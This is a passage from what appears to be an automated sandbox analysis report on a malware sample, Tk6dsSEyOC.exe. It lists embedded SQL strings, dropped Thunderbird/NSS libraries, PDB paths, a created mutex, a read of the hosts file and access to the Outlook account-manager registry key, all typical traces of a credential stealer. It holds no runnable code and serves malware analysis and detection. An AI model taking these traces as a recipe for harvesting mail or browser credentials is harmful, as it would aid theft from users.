                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s;
                      Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: sqlite3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                      Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_01
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Mutant created: \Sessions\1\BaseNamedObjects\useriZ5i-O1fR-8gT0
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Command line argument: NaF 0_2_004660A0
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: Tk6dsSEyOC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb source: Tk6dsSEyOC.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr
                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
                      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb0= source: Tk6dsSEyOC.exe
                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
                      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
                      Source: